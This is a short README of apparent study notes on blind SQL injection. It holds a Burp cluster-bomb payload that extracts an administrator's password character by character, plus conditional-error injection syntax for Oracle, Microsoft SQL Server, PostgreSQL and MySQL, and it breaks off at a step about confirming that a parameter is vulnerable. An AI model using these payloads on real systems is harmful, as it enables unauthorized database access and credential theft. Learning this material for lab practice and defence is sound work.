aagatsharma/SQL-Scripts/README.md

                 -> burp payload(cluster-bomb): ' and (select substring(password,$1$,1) from users where username='administrator' and LENGTH (password)>1) = '$a$'--'
                 -> 1st type: number from 1 to 20.
 2nd type: bruteforcer.

 ***** Blind SQLI with conditional errors *****

+        Oracle       :	SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN to_char(1/0) ELSE NULL END FROM dual Microsoft    :	SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/0 ELSE NULL END PostgreSQL   :	SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN cast(1/0 as text) ELSE NULL END MySQL 	     :  SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),'a')

 1. Confirm that the parameter is vulnerable